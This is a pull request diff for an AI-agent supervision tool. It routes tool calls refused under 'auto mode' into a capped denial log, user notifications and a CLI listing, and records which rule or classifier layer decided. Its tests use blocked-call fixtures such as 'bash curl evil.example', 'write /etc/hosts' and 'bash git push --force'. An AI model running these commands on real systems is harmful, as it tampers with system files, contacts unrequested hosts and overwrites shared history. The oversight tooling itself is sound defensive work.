### PR TITLE
feat(automode): carry a denial from the session to the user

### DIFF
--- a/app/src/hooks/useDaemonSocket.ts
+++ b/app/src/hooks/useDaemonSocket.ts
@@ -263,7 +263,7 @@ export interface RateLimitState {
 
 // Protocol version - must match daemon's ProtocolVersion
 // Increment when making breaking changes to the protocol
-export const PROTOCOL_VERSION = '255';
+export const PROTOCOL_VERSION = '256';
 const MAX_PENDING_ATTACH_OUTPUTS = 512;
 
 // Identifies this app process to the daemon across its own reconnects, so a

--- a/app/src/types/generated.ts
+++ b/app/src/types/generated.ts
@@ -1231,6 +1231,7 @@ export interface AutoModeDenialInfo {
     created_at: string;
     id:         number;
     reason:     string;
+    rule:       string;
     session_id: string;
     signature:  string;
     tool:       string;
@@ -1256,6 +1257,7 @@ export interface DenialElement {
     created_at: string;
     id:         number;
     reason:     string;
+    rule:       string;
     session_id: string;
     signature:  string;
     tool:       string;
@@ -13544,6 +13546,7 @@ const typeMap: any = {
         { json: "created_at", js: "created_at", typ: "" },
         { json: "id", js: "id", typ: 0 },
         { json: "reason", js: "reason", typ: "" },
+        { json: "rule", js: "rule", typ: "" },
         { json: "session_id", js: "session_id", typ: "" },
         { json: "signature", js: "signature", typ: "" },
         { json: "tool", js: "tool", typ: "" },
@@ -13559,6 +13562,7 @@ const typeMap: any = {
         { json: "created_at", js: "created_at", typ: "" },
         { json: "id", js: "id", typ: 0 },
         { json: "reason", js: "reason", typ: "" },
+        { json: "rule", js: "rule", typ: "" },
         { json: "session_id", js: "session_id", typ: "" },
         { json: "signature", js: "signature", typ: "" },
         { json: "tool", js: "tool", typ: "" },

--- a/changelog.d/automode-denials-reach-attn.yaml
+++ b/changelog.d/automode-denials-reach-attn.yaml
@@ -1,0 +1,9 @@
+kind: added
+area: automode
+change: >
+  A call auto mode refuses in a pi session now reaches attn. The denial
+  arrives as a notification naming what was blocked and why, and
+  `attn automode denials` lists the recent ones with the session, the
+  blocked call, the reason, and which rule or classifier layer decided.
+  The run is never interrupted: the agent gets the reason, adapts or asks,
+  and a plain reply in the conversation is still the approval.

--- a/cmd/attn/automode.go
+++ b/cmd/attn/automode.go
@@ -302,13 +302,20 @@ func runAutoModeDenials(args []string) {
 		writeJSON(result)
 		return
 	}
-	if len(result.Denials) == 0 {
-		fmt.Println("no denials recorded")
+	writeAutoModeDenials(os.Stdout, result.Denials)
+}
+
+// writeAutoModeDenials prints the feed newest first, one row per denial: when,
+// which session, who decided, what was blocked, and why.
+func writeAutoModeDenials(out io.Writer, denials []protocol.AutoModeDenialInfo) {
+	if len(denials) == 0 {
+		fmt.Fprintln(out, "no denials recorded")
 		return
 	}
-	w := tabwriter.NewWriter(os.Stdout, 0, 0, 2, ' ', 0)
-	for _, denial := range result.Denials {
-		fmt.Fprintf(w, "%s\t%s\t%s\t%s\n", denial.CreatedAt, denial.SessionID, denial.Signature, denial.Reason)
+	w := tabwriter.NewWriter(out, 0, 0, 2, ' ', 0)
+	for _, denial := range denials {
+		fmt.Fprintf(w, "%s\t%s\t%s\t%s\t%s\n",
+			denial.CreatedAt, denial.SessionID, denial.Rule, denial.Signature, denial.Reason)
 	}
 	w.Flush()
 }

--- a/cmd/attn/automode_test.go
+++ b/cmd/attn/automode_test.go
@@ -1,8 +1,11 @@
 package main
 
 import (
+	"bytes"
 	"strings"
 	"testing"
+
+	"github.com/victorarias/attn/internal/protocol"
 )
 
 // The pattern an agent types is the whole payload, and it routinely contains
@@ -45,5 +48,38 @@ func TestAutoModeTakeStringFlagReadsBothForms(t *testing.T) {
 	}
 	if _, ok := takeStringFlag([]string{"--json"}, "--limit"); ok {
 		t.Error("takeStringFlag found a flag that is not there")
+	}
+}
+
+// The denials feed is what a person or an agent reads to see what auto mode
+// refused, so every column has to be there: when, which session, who decided,
+// the blocked call, and the reason.
+func TestAutoModeDenialsRenderEveryColumn(t *testing.T) {
+	var out bytes.Buffer
+	writeAutoModeDenials(&out, []protocol.AutoModeDenialInfo{{
+		ID:        2,
+		SessionID: "pi-1",
+		Tool:      "bash",
+		Signature: "bash: curl https://example.com",
+		Reason:    "the user never asked to reach that host",
+		Rule:      "classifier-2a",
+		CreatedAt: "2026-08-17T10:00:00Z",
+	}})
+	rendered := out.String()
+	for _, want := range []string{
+		"2026-08-17T10:00:00Z", "pi-1", "classifier-2a",
+		"bash: curl https://example.com", "the user never asked to reach that host",
+	} {
+		if !strings.Contains(rendered, want) {
+			t.Errorf("denials output is missing %q:\n%s", want, rendered)
+		}
+	}
+}
+
+func TestAutoModeDenialsSayWhenThereAreNone(t *testing.T) {
+	var out bytes.Buffer
+	writeAutoModeDenials(&out, nil)
+	if !strings.Contains(out.String(), "no denials recorded") {
+		t.Errorf("empty feed rendered as %q", out.String())
 	}
 }

--- a/docs/glossary.md
+++ b/docs/glossary.md
@@ -840,3 +840,11 @@ able to write its own leash.
 Environment prose is the exception: `attn automode env add` edits it directly,
 because it describes the machine to the classifier rather than naming a rule
 that skips it.
+
+A **denial** is one call auto mode refused. The session reports it to attn,
+which keeps it in a bounded log, raises a notification naming what was blocked
+and why, and lists it under `attn automode denials`. Every denial says who
+decided — a static envelope rule, the classifier layer that answered
+(`classifier-2a`, `classifier-2b`), or the circuit breaker. A denial never
+stops the run: the agent is given the reason, and a plain reply approving the
+action is what lets it retry.

--- a/internal/daemon/automode.go
+++ b/internal/daemon/automode.go
@@ -164,6 +164,74 @@ func (d *Daemon) handleAutoModeDenials(conn net.Conn, msg *protocol.AutoModeDeni
 	})
 }
 
+// notificationKindAutoModeDenied marks the notification a refused call raises.
+const notificationKindAutoModeDenied = "automode_denied"
+
+// recordAutoModeDenial is where a session's refusal becomes something the user
+// can see: a row in the denials log, a notification naming what was blocked and
+// why, and one `automode.denied` fact carrying the session it happened in.
+//
+// Nothing here is recurring. A session that denies nothing writes nothing,
+// publishes nothing, and draws nothing.
+func (d *Daemon) recordAutoModeDenial(params pluginReportAutoModeDenialParams) error {
+	if d.store == nil {
+		return fmt.Errorf("no database")
+	}
+	sessionID := strings.TrimSpace(params.SessionID)
+	at := time.Now()
+	if stamp, err := time.Parse(time.RFC3339, strings.TrimSpace(params.At)); err == nil {
+		at = stamp
+	}
+	stored, dropped, err := d.store.RecordAutoModeDenial(store.AutoModeDenial{
+		SessionID: sessionID,
+		Tool:      strings.TrimSpace(params.Tool),
+		Signature: strings.TrimSpace(params.Action),
+		Reason:    strings.TrimSpace(params.Reason),
+		Rule:      strings.TrimSpace(params.Rule),
+	}, at)
+	if err != nil {
+		return err
+	}
+	if dropped > 0 {
+		d.logf("automode: denial log is at its %d-row cap; dropped %d oldest", store.AutoModeDenialRows, dropped)
+	}
+	record, err := d.store.AddNotification(autoModeDenialNotification(d.sessionLabel(sessionID), stored), time.Now())
+	if err != nil {
+		d.logf("automode: add denial notification for session %s: %v", sessionID, err)
+		return nil
+	}
+	d.logf("automode: denied session=%s rule=%s action=%q notification=%s",
+		sessionID, stored.Rule, stored.Signature, record.ID)
+	// One fact, not two: the notification is how this denial is surfaced, and
+	// automode.denied's projection is what pushes it. Its subject is the session
+	// because that is the entity a denial is about.
+	d.publishFact(FactAutoModeDenied, sessionID, nil)
+	return nil
+}
+
+// sessionLabel names a session the way the user does, falling back to its id
+// when the session is gone by the time the report lands.
+func (d *Daemon) sessionLabel(sessionID string) string {
+	if session := d.store.Get(sessionID); session != nil && strings.TrimSpace(session.Label) != "" {
+		return session.Label
+	}
+	return sessionID
+}
+
+func autoModeDenialNotification(label string, denial store.AutoModeDenial) store.NotificationRecord {
+	return store.NotificationRecord{
+		Kind: notificationKindAutoModeDenied,
+		// Auto mode working as designed: the agent got the reason, adapted or
+		// asked, and the run went on. Worth seeing, never worth interrupting for.
+		Severity:   store.NotificationInfo,
+		Title:      fmt.Sprintf("Auto mode blocked a call in %s", label),
+		Body:       denial.Signature,
+		Detail:     fmt.Sprintf("%s (%s)", denial.Reason, denial.Rule),
+		SourceKind: "session",
+		SourceID:   denial.SessionID,
+	}
+}
+
 func autoModeConfigInfo(cfg automode.Config) protocol.AutoModeConfigInfo {
 	return protocol.AutoModeConfigInfo{
 		EnabledDefault:  cfg.EnabledDefault,
@@ -205,6 +273,7 @@ func autoModeDenialInfos(denials []store.AutoModeDenial) []protocol.AutoModeDeni
 			Tool:      denial.Tool,
 			Signature: denial.Signature,
 			Reason:    denial.Reason,
+			Rule:      denial.Rule,
 			CreatedAt: formatAutoModeStamp(denial.CreatedAt),
 		})
 	}

--- a/internal/daemon/automode_test.go
+++ b/internal/daemon/automode_test.go
@@ -10,6 +10,7 @@ import (
 
 	"github.com/victorarias/attn/internal/automode"
 	"github.com/victorarias/attn/internal/protocol"
+	"github.com/victorarias/attn/internal/store"
 )
 
 // Auto mode's two transports and the line between them. What these pin is the
@@ -118,7 +119,9 @@ func TestAutoModeEnvironmentAddAndRemove(t *testing.T) {
 	}
 }
 
-func TestAutoModeDenialsIsEmptyUntilSlice5ReportsThem(t *testing.T) {
+// The unix-socket read `attn automode denials` answers with: newest first, and
+// carrying the rule that decided so the feed says who refused the call.
+func TestAutoModeDenialsReadsWhatSessionsReported(t *testing.T) {
 	d := newDaemonForTest(t)
 	resp := docCall(t, func(c net.Conn) {
 		d.handleAutoModeDenials(c, &protocol.AutoModeDenialsMessage{Cmd: protocol.CmdAutoModeDenials})
@@ -127,7 +130,29 @@ func TestAutoModeDenialsIsEmptyUntilSlice5ReportsThem(t *testing.T) {
 		t.Fatalf("denials: %v", protocol.Deref(resp.Error))
 	}
 	if len(resp.AutomodeDenialsResult.Denials) != 0 {
-		t.Fatalf("denials = %+v", resp.AutomodeDenialsResult.Denials)
+		t.Fatalf("a machine that denied nothing has denials: %+v", resp.AutomodeDenialsResult.Denials)
+	}
+
+	for _, action := range []string{"bash: curl https://one.example", "write /etc/hosts"} {
+		if _, _, err := d.store.RecordAutoModeDenial(store.AutoModeDenial{
+			SessionID: "pi-1", Tool: "bash", Signature: action,
+			Reason: "outside the envelope", Rule: "classifier-2a",
+		}, time.Now()); err != nil {
+			t.Fatalf("record denial: %v", err)
+		}
+	}
+	resp = docCall(t, func(c net.Conn) {
+		d.handleAutoModeDenials(c, &protocol.AutoModeDenialsMessage{Cmd: protocol.CmdAutoModeDenials})
+	})
+	listed := resp.AutomodeDenialsResult.Denials
+	if len(listed) != 2 {
+		t.Fatalf("denials = %+v, want both", listed)
+	}
+	if listed[0].Signature != "write /etc/hosts" {
+		t.Errorf("newest denial = %q", listed[0].Signature)
+	}
+	if listed[0].Rule != "classifier-2a" || listed[0].SessionID != "pi-1" || listed[0].CreatedAt == "" {
+		t.Errorf("denial = %+v, want session, rule and time", listed[0])
 	}
 }
 
@@ -236,5 +261,122 @@ func TestSettingsSnapshotCarriesTheAutoModeDefault(t *testing.T) {
 	}
 	if err := d.validateSetting(SettingAutoModeEnabledDefault, "true"); err == nil {
 		t.Error("set_setting accepted the daemon-computed auto mode default")
+	}
+}
+
+// The denial wire, daemon end: a driver reports one refused call and it becomes
+// a row, a notification, and one automode.denied fact naming its session.
+func TestAutoModeDenialFromADriverBecomesARowANotificationAndAFact(t *testing.T) {
+	d := NewForTesting(filepath.Join(t.TempDir(), "test.sock"))
+	client, done := startPluginPipe(t, d, "pi-plugin", nil)
+	defer func() {
+		_ = client.Close()
+		<-done
+	}()
+	registerTestPluginDriver(t, client, "pi", map[string]bool{"state_reporting": true, "auto_mode": true})
+
+	now := protocol.TimestampNow().String()
+	d.store.Add(&protocol.Session{
+		ID: "pi-denial", Label: "envelope work", Agent: "pi", Directory: t.TempDir(),
+		State: protocol.SessionStateWorking, StateSince: now, StateUpdatedAt: now, LastSeen: now,
+	})
+	if !d.store.BeginAgentDriverRun("pi-denial", "pi-plugin", "run-1") {
+		t.Fatal("failed to begin the test plugin run")
+	}
+
+	sendPluginMethod(t, client, 3, "session.report_automode_denial", pluginReportAutoModeDenialParams{
+		SessionID: "pi-denial",
+		RunID:     "run-1",
+		Tool:      "bash",
+		Action:    "bash: curl https://example.com",
+		Reason:    "the user never asked to reach that host",
+		Rule:      "classifier-2a",
+		At:        "2026-08-17T10:00:00Z",
+	})
+
+	denials, err := d.store.ListAutoModeDenials(10)
+	if err != nil {
+		t.Fatalf("list denials: %v", err)
+	}
+	if len(denials) != 1 {
+		t.Fatalf("denials = %d, want the one that was reported", len(denials))
+	}
+	got := denials[0]
+	if got.SessionID != "pi-denial" || got.Tool != "bash" || got.Rule != "classifier-2a" {
+		t.Errorf("denial row = %+v", got)
+	}
+	if got.Signature != "bash: curl https://example.com" {
+		t.Errorf("signature = %q, want the blocked call", got.Signature)
+	}
+	if !got.CreatedAt.Equal(time.Date(2026, 8, 17, 10, 0, 0, 0, time.UTC)) {
+		t.Errorf("created_at = %s, want the time the session refused it", got.CreatedAt)
+	}
+
+	notes, err := d.store.ListNotifications()
+	if err != nil {
+		t.Fatalf("list notifications: %v", err)
+	}
+	if len(notes) != 1 {
+		t.Fatalf("notifications = %d, want the denial's", len(notes))
+	}
+	note := notes[0]
+	if note.Kind != notificationKindAutoModeDenied || note.SourceID != "pi-denial" {
+		t.Errorf("notification = %+v", note)
+	}
+	if !strings.Contains(note.Title, "envelope work") {
+		t.Errorf("title does not name the session: %q", note.Title)
+	}
+	if !strings.Contains(note.Body, "curl https://example.com") {
+		t.Errorf("body does not say what was blocked: %q", note.Body)
+	}
+	if !strings.Contains(note.Detail, "never asked to reach that host") ||
+		!strings.Contains(note.Detail, "classifier-2a") {
+		t.Errorf("detail does not carry the reason and who decided: %q", note.Detail)
+	}
+
+	published := docFacts(t, d, FactAutoModeDenied)
+	if len(published) != 1 || published[0].Subject != "pi-denial" {
+		t.Fatalf("automode.denied facts = %+v, want one naming the session", published)
+	}
+}
+
+// A denial reported against a run this plugin does not own changes nothing —
+// the denials feed is what the user trusts to say what their sessions did.
+func TestAutoModeDenialFromAnUnownedRunIsRefused(t *testing.T) {
+	d := NewForTesting(filepath.Join(t.TempDir(), "test.sock"))
+	client, done := startPluginPipe(t, d, "pi-plugin", nil)
+	defer func() {
+		_ = client.Close()
+		<-done
+	}()
+	registerTestPluginDriver(t, client, "pi", map[string]bool{"auto_mode": true})
+
+	now := protocol.TimestampNow().String()
+	d.store.Add(&protocol.Session{
+		ID: "pi-denial", Label: "pi", Agent: "pi", Directory: t.TempDir(),
+		State: protocol.SessionStateWorking, StateSince: now, StateUpdatedAt: now, LastSeen: now,
+	})
+	if !d.store.BeginAgentDriverRun("pi-denial", "pi-plugin", "run-1") {
+		t.Fatal("failed to begin the test plugin run")
+	}
+
+	response := sendPluginMethodResponse(t, client, 3, "session.report_automode_denial",
+		pluginReportAutoModeDenialParams{SessionID: "pi-denial", RunID: "run-other", Action: "bash: git push --force"})
+	if response.Error == nil {
+		t.Fatal("a denial for a run the plugin does not own was accepted")
+	}
+
+	response = sendPluginMethodResponse(t, client, 4, "session.report_automode_denial",
+		pluginReportAutoModeDenialParams{SessionID: "pi-denial", RunID: "run-1", Action: "   "})
+	if response.Error == nil {
+		t.Fatal("a denial with no action named was accepted")
+	}
+
+	denials, err := d.store.ListAutoModeDenials(10)
+	if err != nil {
+		t.Fatalf("list denials: %v", err)
+	}
+	if len(denials) != 0 {
+		t.Fatalf("refused denials reached the log: %+v", denials)
 	}
 }

--- a/internal/daemon/bus.go
+++ b/internal/daemon/bus.go
@@ -160,6 +160,13 @@ const (
 	FactNotificationCreated = "notification.created"
 	FactNotificationRead    = "notification.read"
 
+	// FactAutoModeDenied: a pi session refused a tool call under auto mode.
+	// Subject is the session it happened in — the entity a denial is about. The
+	// denial itself is already in the store when this is published, and the
+	// notification that surfaces it with it, which is why the projection is the
+	// notification push and there is no second notification.created fact.
+	FactAutoModeDenied = "automode.denied"
+
 	// FactAutomationChanged: subject is the automation definition id.
 	FactAutomationChanged = "automation.changed"
 	// FactWorkflowRunUpdated: subject is the workflow run id.
@@ -507,6 +514,10 @@ func buildWireProjections() []projection {
 		},
 		{
 			filter: bus.Filter{"notification.*"},
+			apply:  func(d *Daemon, _ bus.Event) { d.projectNotificationsUpdated() },
+		},
+		{
+			filter: bus.Filter{FactAutoModeDenied},
 			apply:  func(d *Daemon, _ bus.Event) { d.projectNotificationsUpdated() },
 		},
 		{

--- a/internal/daemon/bus_wire_join_test.go
+++ b/internal/daemon/bus_wire_join_test.go
@@ -289,8 +289,11 @@ var wireFixtures = map[string]wireFixture{
 	// Everything else with a panel of its own.
 	FactNotificationCreated: {events: []string{protocol.EventNotificationsUpdated}},
 	FactNotificationRead:    {events: []string{protocol.EventNotificationsUpdated}},
-	FactAutomationChanged:   {events: []string{protocol.EventAutomationsChanged}},
-	FactTaskChanged:         {events: []string{protocol.EventTasksChanged}},
+	// A denial is surfaced as a notification, so it pushes the same list. Its
+	// subject is the session it happened in, which no projection re-reads.
+	FactAutoModeDenied:    {events: []string{protocol.EventNotificationsUpdated}},
+	FactAutomationChanged: {events: []string{protocol.EventAutomationsChanged}},
+	FactTaskChanged:       {events: []string{protocol.EventTasksChanged}},
 	FactNotebookFileChanged: {
 		events:  []string{protocol.EventNotebookChanged},
 		subject: func(*wireWorld) string { return "note.md" },

--- a/internal/daemon/plugin_driver.go
+++ b/internal/daemon/plugin_driver.go
@@ -112,6 +112,20 @@ type pluginDeliverMessageResult struct {
 	OK bool `json:"ok"`
 }
 
+// One call a driver's agent refused under auto mode. No seq: a denial is an
+// append, not a declaration about the session's current state, so nothing later
+// can overtake it.
+type pluginReportAutoModeDenialParams struct {
+	SessionID string `json:"session_id"`
+	RunID     string `json:"run_id"`
+	Tool      string `json:"tool"`
+	Action    string `json:"action"`
+	Reason    string `json:"reason"`
+	Rule      string `json:"rule"`
+	// When the session refused it, RFC 3339. Empty falls back to arrival.
+	At string `json:"at"`
+}
+
 type pluginClassifyStopParams struct {
 	SessionID     string `json:"session_id"`
 	RunID         string `json:"run_id"`
@@ -288,6 +302,21 @@ func (d *Daemon) handlePluginDriverMethod(plugin *pluginConnection, msg jsonRPCM
 				return nil, true, err
 			}
 			d.applyPluginReportedMetadata(params)
+		}
+		return struct{}{}, true, nil
+	case "session.report_automode_denial":
+		var params pluginReportAutoModeDenialParams
+		if err := json.Unmarshal(msg.Params, &params); err != nil {
+			return nil, true, fmt.Errorf("decode session.report_automode_denial params: %w", err)
+		}
+		if strings.TrimSpace(params.Action) == "" {
+			return nil, true, errors.New("session.report_automode_denial action is required")
+		}
+		if err := d.authorizePluginSessionReport(plugin, params.SessionID, params.RunID); err != nil {
+			return nil, true, err
+		}
+		if err := d.recordAutoModeDenial(params); err != nil {
+			return nil, true, err
 		}
 		return struct{}{}, true, nil
 	default:

--- a/internal/protocol/constants.go
+++ b/internal/protocol/constants.go
@@ -10,7 +10,7 @@ import (
 // ProtocolVersion is the version of the daemon-client protocol.
 // Increment this when making breaking changes to the protocol.
 // Client and daemon must have matching versions.
-const ProtocolVersion = "255"
+const ProtocolVersion = "256"
 
 // Error codes. A failed response may carry one beside its message text, naming
 // what a caller can do about it rather than leaving it to match English. Only

--- a/internal/protocol/generated.go
+++ b/internal/protocol/generated.go
@@ -773,6 +773,9 @@ type AutoModeDenialInfo struct {
 	// Reason corresponds to the JSON schema field "reason".
 	Reason string `json:"reason"`
 
+	// Rule corresponds to the JSON schema field "rule".
+	Rule string `json:"rule"`
+
 	// SessionID corresponds to the JSON schema field "session_id".
 	SessionID string `json:"session_id"`
 

--- a/internal/protocol/schema/main.tsp
+++ b/internal/protocol/schema/main.tsp
@@ -4946,14 +4946,17 @@ model AutoModeProposalInfo {
   "resolved_at": string;
 }
 
-// One call auto mode refused. Nothing reports these until slice 5; the shape
-// ships now so the reader and the writer are never introduced separately.
+// One call auto mode refused, as the session reported it.
 model AutoModeDenialInfo {
   "id": safeint;
   "session_id": string;
   "tool": string;
+  // The blocked call in one line — the same text the model was given.
   "signature": string;
   "reason": string;
+  // Who decided: a static envelope rule, the classifier layer that answered
+  // ("classifier-2a" | "classifier-2b"), or "circuit-breaker".
+  "rule": string;
   "created_at": string;
 }
 

--- a/internal/store/automode.go
+++ b/internal/store/automode.go
@@ -35,17 +35,25 @@ type AutoModeProposal struct {
 	ResolvedAt time.Time
 }
 
-// AutoModeDenial is one call auto mode refused. Nothing writes these yet —
-// reporting arrives with slice 5 — but the shape ships now so the CLI's
-// `denials` verb reads the table it will always read.
+// AutoModeDenial is one call auto mode refused. Signature is the blocked call
+// in one line; Rule names who decided — a static envelope rule, the classifier
+// layer that answered (`classifier-2a`/`-2b`), or the circuit breaker.
 type AutoModeDenial struct {
 	ID        int64
 	SessionID string
 	Tool      string
 	Signature string
 	Reason    string
+	Rule      string
 	CreatedAt time.Time
 }
+
+// AutoModeDenialRows is how many denials the log keeps. A tripwire, not a
+// budget: auto mode's own circuit breaker stops a session at 20 denials since
+// the user last spoke (`totalDenialLimit`, plugins/attn-pi/automode/session.ts),
+// so this is 25 breaker-limit episodes — past any real day of work, and short
+// of a loop nobody is watching filling the database.
+const AutoModeDenialRows = 500
 
 // GetAutoModeConfig reads the promoted config, resolved: a machine with no row,
 // or a row that never named a model, gets the shipped defaults rather than empty
@@ -316,30 +324,49 @@ func (s *Store) DiscardAutoModeProposal(id int64, now time.Time) (AutoModePropos
 	return proposal, nil
 }
 
-// RecordAutoModeDenial stores one refused call. Slice 5 wires the reports; this
-// is the writer they land in.
-func (s *Store) RecordAutoModeDenial(sessionID, tool, signature, reason string, now time.Time) (AutoModeDenial, error) {
+// RecordAutoModeDenial stores one refused call and trims the log back to
+// AutoModeDenialRows, returning how many rows that dropped so the caller can
+// say so. The insert and the trim share one transaction: a denial that reached
+// the feed and then vanished on the next write is worse than one never stored.
+func (s *Store) RecordAutoModeDenial(denial AutoModeDenial, now time.Time) (AutoModeDenial, int64, error) {
 	s.mu.Lock()
 	defer s.mu.Unlock()
 	if s.db == nil {
-		return AutoModeDenial{}, fmt.Errorf("store: no database")
+		return AutoModeDenial{}, 0, fmt.Errorf("store: no database")
 	}
-	stamp := now.UTC().Format(sortableTimeFormat)
-	res, err := s.db.Exec(`
-		INSERT INTO automode_denials (session_id, tool, signature, reason, created_at)
-		VALUES (?, ?, ?, ?, ?)
-	`, sessionID, tool, signature, reason, stamp)
+	tx, err := s.db.Begin()
 	if err != nil {
-		return AutoModeDenial{}, err
+		return AutoModeDenial{}, 0, err
 	}
-	id, err := res.LastInsertId()
+	defer tx.Rollback()
+
+	denial.CreatedAt = now.UTC()
+	res, err := tx.Exec(`
+		INSERT INTO automode_denials (session_id, tool, signature, reason, rule, created_at)
+		VALUES (?, ?, ?, ?, ?, ?)
+	`, denial.SessionID, denial.Tool, denial.Signature, denial.Reason, denial.Rule,
+		denial.CreatedAt.Format(sortableTimeFormat))
 	if err != nil {
-		return AutoModeDenial{}, err
+		return AutoModeDenial{}, 0, err
 	}
-	return AutoModeDenial{
-		ID: id, SessionID: sessionID, Tool: tool, Signature: signature,
-		Reason: reason, CreatedAt: now.UTC(),
-	}, nil
+	if denial.ID, err = res.LastInsertId(); err != nil {
+		return AutoModeDenial{}, 0, err
+	}
+	trimmed, err := tx.Exec(`
+		DELETE FROM automode_denials
+		WHERE id <= (SELECT id FROM automode_denials ORDER BY id DESC LIMIT 1 OFFSET ?)`,
+		AutoModeDenialRows)
+	if err != nil {
+		return AutoModeDenial{}, 0, err
+	}
+	dropped, err := trimmed.RowsAffected()
+	if err != nil {
+		return AutoModeDenial{}, 0, err
+	}
+	if err := tx.Commit(); err != nil {
+		return AutoModeDenial{}, 0, err
+	}
+	return denial, dropped, nil
 }
 
 // ListAutoModeDenials returns the most recent denials, newest first.
@@ -353,7 +380,7 @@ func (s *Store) ListAutoModeDenials(limit int) ([]AutoModeDenial, error) {
 		limit = 20
 	}
 	rows, err := s.db.Query(`
-		SELECT id, session_id, tool, signature, reason, created_at
+		SELECT id, session_id, tool, signature, reason, rule, created_at
 		FROM automode_denials ORDER BY id DESC LIMIT ?`, limit)
 	if err != nil {
 		return nil, err
@@ -363,7 +390,7 @@ func (s *Store) ListAutoModeDenials(limit int) ([]AutoModeDenial, error) {
 	for rows.Next() {
 		var d AutoModeDenial
 		var created string
-		if err := rows.Scan(&d.ID, &d.SessionID, &d.Tool, &d.Signature, &d.Reason, &created); err != nil {
+		if err := rows.Scan(&d.ID, &d.SessionID, &d.Tool, &d.Signature, &d.Reason, &d.Rule, &created); err != nil {
 			return nil, err
 		}
 		d.CreatedAt = parseStoredTime(created)

--- a/internal/store/automode_test.go
+++ b/internal/store/automode_test.go
@@ -213,8 +213,14 @@ func TestAutoModeDenialsReadNewestFirst(t *testing.T) {
 	s := New()
 	now := time.Now().UTC()
 	for _, signature := range []string{"bash curl evil.example", "write /etc/hosts", "bash git push --force"} {
-		if _, err := s.RecordAutoModeDenial("session-1", "bash", signature, "outside the envelope", now); err != nil {
+		denial := AutoModeDenial{
+			SessionID: "session-1", Tool: "bash", Signature: signature,
+			Reason: "outside the envelope", Rule: "classifier-2a",
+		}
+		if _, dropped, err := s.RecordAutoModeDenial(denial, now); err != nil {
 			t.Fatalf("record denial: %v", err)
+		} else if dropped != 0 {
+			t.Fatalf("dropped %d rows well under the %d-row cap", dropped, AutoModeDenialRows)
 		}
 	}
 	denials, err := s.ListAutoModeDenials(2)
@@ -226,6 +232,46 @@ func TestAutoModeDenialsReadNewestFirst(t *testing.T) {
 	}
 	if denials[0].Signature != "bash git push --force" {
 		t.Errorf("newest denial = %q", denials[0].Signature)
+	}
+	if denials[0].Rule != "classifier-2a" {
+		t.Errorf("rule = %q, want the layer that decided", denials[0].Rule)
+	}
+}
+
+// The row cap is a tripwire, so this is the only place anyone sees it work: a
+// session looping past it keeps the newest AutoModeDenialRows and says how many
+// it dropped.
+func TestAutoModeDenialsTrimToTheRowCap(t *testing.T) {
+	s := New()
+	now := time.Now().UTC()
+	total := AutoModeDenialRows + 3
+	droppedTotal := int64(0)
+	for i := range total {
+		denial := AutoModeDenial{
+			SessionID: "session-1", Tool: "bash",
+			Signature: fmt.Sprintf("bash echo %d", i), Reason: "outside the envelope",
+		}
+		_, dropped, err := s.RecordAutoModeDenial(denial, now)
+		if err != nil {
+			t.Fatalf("record denial %d: %v", i, err)
+		}
+		droppedTotal += dropped
+	}
+	if droppedTotal != 3 {
+		t.Errorf("dropped %d rows, want the 3 that overflowed the cap", droppedTotal)
+	}
+	denials, err := s.ListAutoModeDenials(total)
+	if err != nil {
+		t.Fatalf("list denials: %v", err)
+	}
+	if len(denials) != AutoModeDenialRows {
+		t.Fatalf("kept %d denials, want the %d-row cap", len(denials), AutoModeDenialRows)
+	}
+	if want := fmt.Sprintf("bash echo %d", total-1); denials[0].Signature != want {
+		t.Errorf("newest kept denial = %q, want %q", denials[0].Signature, want)
+	}
+	if want := fmt.Sprintf("bash echo %d", total-AutoModeDenialRows); denials[len(denials)-1].Signature != want {
+		t.Errorf("oldest kept denial = %q, want %q", denials[len(denials)-1].Signature, want)
 	}
 }
 

--- a/internal/store/sqlite.go
+++ b/internal/store/sqlite.go
@@ -1155,6 +1155,8 @@ CREATE TABLE IF NOT EXISTS automode_denials (
     created_at TEXT NOT NULL
 );
 CREATE INDEX IF NOT EXISTS idx_automode_denials_recent ON automode_denials(id DESC);`},
+	// Applied by applyMigration110, whose ALTER is column-guarded.
+	{110, "record which rule denied an auto mode call", ``},
 }
 
 // migration99SQL is everything migration 99 does after its guarded ALTER.
@@ -1551,6 +1553,11 @@ func migrateDB(db *sql.DB, dbPath string) error {
 			}
 		} else if m.version == 107 {
 			if err := applyMigration107(tx); err != nil {
+				tx.Rollback()
+				return fmt.Errorf("migration %d (%s): %w", m.version, m.desc, err)
+			}
+		} else if m.version == 110 {
+			if err := applyMigration110(tx); err != nil {
 				tx.Rollback()
 				return fmt.Errorf("migration %d (%s): %w", m.version, m.desc, err)
 			}
@@ -2732,6 +2739,22 @@ func applyMigration103(tx *sql.Tx) error {
 
 // applyMigration106 adds the opaque per-session cost ledger. The guard makes
 // schema-migration rewind tests and interrupted upgrade recovery idempotent.
+// applyMigration110 records who refused an auto mode call: a static envelope
+// rule ("hard-deny", "unknown-tool"), the classifier layer that answered
+// ("classifier-2a", "classifier-2b"), or the circuit breaker.
+//
+// Guarded because a database can reach this with the column already there: a
+// migration test builds the current schema and rewinds the recorded version,
+// which replays this ALTER against a table that already carries it.
+func applyMigration110(tx *sql.Tx) error {
+	has, err := columnExists(tx, "automode_denials", "rule")
+	if err != nil || has {
+		return err
+	}
+	_, err = tx.Exec("ALTER TABLE automode_denials ADD COLUMN rule TEXT NOT NULL DEFAULT ''")
+	return err
+}
+
 func applyMigration106(tx *sql.Tx) error {
 	has, err := columnExists(tx, "sessions", "session_cost_json")
 	if err != nil || has {

--- a/plugins/attn-pi/AGENTS.md
+++ b/plugins/attn-pi/AGENTS.md
@@ -394,5 +394,13 @@ rather than through dialogs. Design and slices:
   (`-p`, `--mode json`) is fail-closed, per `permission-gate.ts`'s precedent.
   Answering yes clears the counters and judges the call that tripped it — it
   approves nothing on its own.
-- Denials are reported through `AutoMode`'s `onDenial` seam. Nothing sets it
-  yet: attn-side reporting is slice 5.
+- Denials are reported through `AutoMode`'s `onDenial` seam. `suite/index.ts`
+  sets it to one `suite.report_denial` over the relay, which the driver
+  forwards to the daemon as `session.report_automode_denial`; the standalone
+  bundle leaves it unset, so a bare pi reports nowhere. It is fire-and-forget
+  like every other suite report — a reporter that throws is caught, because
+  nothing outside auto mode may turn a denial into something else. The report
+  carries no seq: it is an append, not a claim about the session's state.
+- A denial names who decided. Static rules keep their own names; a classified
+  call reports the layer that answered (`classifier-2a`, `classifier-2b`),
+  which is why `ClassifierVerdict` carries a `layer`.

--- a/plugins/attn-pi/automode/classifier.ts
+++ b/plugins/attn-pi/automode/classifier.ts
